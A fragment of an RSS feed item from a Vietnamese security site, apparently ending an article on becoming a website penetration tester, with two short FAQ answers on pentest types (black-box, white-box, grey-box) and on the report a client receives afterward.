<h3>Có những loại kiểm thử thâm nhập nào?</h3>
<p>Có nhiều loại, dựa trên mức độ thông tin được cung cấp cho người kiểm thử: Black-box (không có thông tin), White-box (có đầy đủ thông tin), và Grey-box (có một phần thông tin).  Ngoài ra còn phân loại dựa trên mục tiêu kiểm tra (mạng nội bộ, không dây, dữ liệu đám mây&#8230;).</p>
<h3>Sau khi pentest, tôi sẽ nhận được gì?</h3>
<p>Bạn sẽ nhận được một báo cáo chi tiết về các lỗ hổng bảo mật được phát hiện, mức độ nghiêm trọng, rủi ro tiềm ẩn, và khuyến nghị khắc phục cụ thể, giúp bạn tăng cường bảo mật website hiệu quả.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/lo-trinh-tro-thanh-nha-kiem-thu-tham-nhap-website/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
